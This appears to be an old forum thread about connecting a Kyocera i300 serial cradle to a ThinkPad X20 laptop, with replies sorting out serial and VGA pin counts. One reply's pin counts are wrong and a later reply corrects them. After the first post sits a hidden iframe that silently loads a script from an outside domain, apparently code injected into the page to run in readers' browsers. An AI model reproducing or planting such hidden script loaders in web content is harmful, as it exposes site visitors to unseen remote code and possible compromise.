Anyone not have place to put i300 serial cradle on laptop?

I've had the phone 2 weeks and love it. Problem: I have two laptops (work and personal). I've got the phone synching with my home laptop great, but my work laptop is an IBM thinkpad (don't know model #). All it has is one "female" serial port -- and the i300 serial is also female. Thus, as far as I can tell, there is no way to connect the two (other than IR, which is really slow). I assume there is some sort of adapter I can get somewhere... anyone have any insight?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

you can get an adapter...... just make sure its a a serial port your looking at on the 2nd laptop.... could it be some other kind of port?

I wouldn't think IBM would make a laptop with the connector reveresed, thereby different than the standard....

Yeah, count the pins - a serial has 15 pins, a VGA port has like 25 or something

No serial is a 9 pin connector. Display connector is 15 pin.

15 pins. So nowhere to hook up the unit? This is a brand new laptop, Pentium 3, Thinkpad X20. Weird. (I realize serial is old technology, but not completely outdated).
